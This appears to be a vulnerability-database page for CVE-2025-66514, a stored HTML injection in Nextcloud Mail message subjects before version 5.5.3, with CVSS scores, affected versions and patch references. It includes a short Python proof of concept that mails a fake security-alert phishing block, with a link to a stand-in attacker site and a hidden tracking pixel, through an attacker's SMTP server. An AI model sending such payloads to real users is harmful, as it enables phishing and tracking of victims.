Security Vulnerability Report
CVE-2025-66514 CVSS 3.5 LOW

CVE-2025-66514

Published: 2025-12-05 18:15:57
Last Modified: 2025-12-09 19:23:20

Description

Nextcloud Mail is the mail app for Nextcloud, a self-hosted productivity platform. Prior to 5.5.3, a stored HTML injection in the Mail app's message list allowed an authenticated user to inject HTML into email subjects. JavaScript was correctly blocked by the content security policy of the Nextcloud Server code.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

The 3.5 LOW score is the secondary assessment in the NVD record. NVD's primary assessment of the same CVE is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 MEDIUM: it rates the scope as changed and the confidentiality impact as Low, which is what lifts the rating from Low to Medium.

Configurations (Affected Products)

cpe:2.3:a:nextcloud:mail:*:*:*:*:*:nextcloud:*:* - VULNERABLE
Nextcloud Mail < 5.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66514 PoC - Nextcloud Mail HTML Injection
# This PoC demonstrates HTML injection in email subject
import smtplib
from email.mime.text import MIMEText
from email.header import Header

# Attacker-controlled SMTP server configuration
attacker_smtp = 'attacker-smtp.example.com'
attacker_email = '[email protected]'
target_email = '[email protected]'

# Malicious HTML payload injected into email subject
# Note: JavaScript is blocked by Nextcloud CSP
html_payload = '''
<div style="background:linear-gradient(to bottom, #f8f9fa, #e9ecef);padding:20px;border-radius:8px;box-shadow:0 2px 8px rgba(0,0,0,0.15);">
<h2 style="color:#d32f2f;margin-top:0;">⚠️ Security Alert</h2>
<p>Your account has been compromised!</p>
<p>Please <a href="http://attacker-evil-site.com/phishing">click here</a> to verify your identity.</p>
<img src="http://attacker-tracking.com/track.gif" style="display:none;">
</div>
'''

# Create email with malicious subject
msg = MIMEText(html_payload, 'html', 'utf-8')
# email.header.Header applies RFC 2047 encoding to the subject for transport
msg['Subject'] = Header(html_payload, 'utf-8')
msg['From'] = attacker_email
msg['To'] = target_email

try:
    # Send the malicious email
    with smtplib.SMTP(attacker_smtp) as server:
        server.send_message(msg)
    print('[+] Malicious email sent successfully')
    print('[+] When victim views email list, HTML will be rendered')
except Exception as e:
    print(f'[-] Error: {e}')
```

References

https://github.com/nextcloud/mail/commit/c64fcc3b79e0c089b5e1d2e04a07bfa740b2ac09 (Patch)
https://github.com/nextcloud/mail/pull/11740 (Issue Tracking, Patch)
https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v394-8gpc-6fv5 (Patch, Vendor Advisory)
https://hackerone.com/reports/3357036 (Permissions Required, Vendor Advisory)
